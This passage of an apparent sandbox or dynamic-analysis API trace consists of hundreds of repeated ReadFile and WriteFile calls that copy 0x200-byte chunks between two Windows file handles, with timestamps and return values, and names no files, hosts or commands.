lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.070] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.071] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.071] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.072] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.072] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.073] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.073] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.074] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.074] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.075] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1fb, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.075] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.076] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.076] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.077] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.077] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.078] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.078] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.079] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.079] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.080] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.080] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.081] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.081] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.082] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.082] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.083] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.083] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.084] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.084] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.085] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.085] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.086] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.086] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.087] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.087] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.088] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.088] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.089] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.089] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.090] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.090] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.091] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.091] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.092] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.093] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.093] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.094] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.094] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.095] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.095] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.095] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.096] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.096] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.097] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.097] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.098] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.098] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.099] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.099] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.100] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.100] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.101] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.101] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.102] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.102] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.103] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.103] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.104] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.104] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.104] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.105] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.105] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.106] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.106] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1fb, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.107] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.109] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.109] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.110] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.110] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.111] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.111] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.111] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.112] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.112] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.113] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.113] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.114] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.114] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.115] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.115] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.116] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.118] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.119] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.119] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.120] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.120] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.121] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.121] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.122] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.122] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, 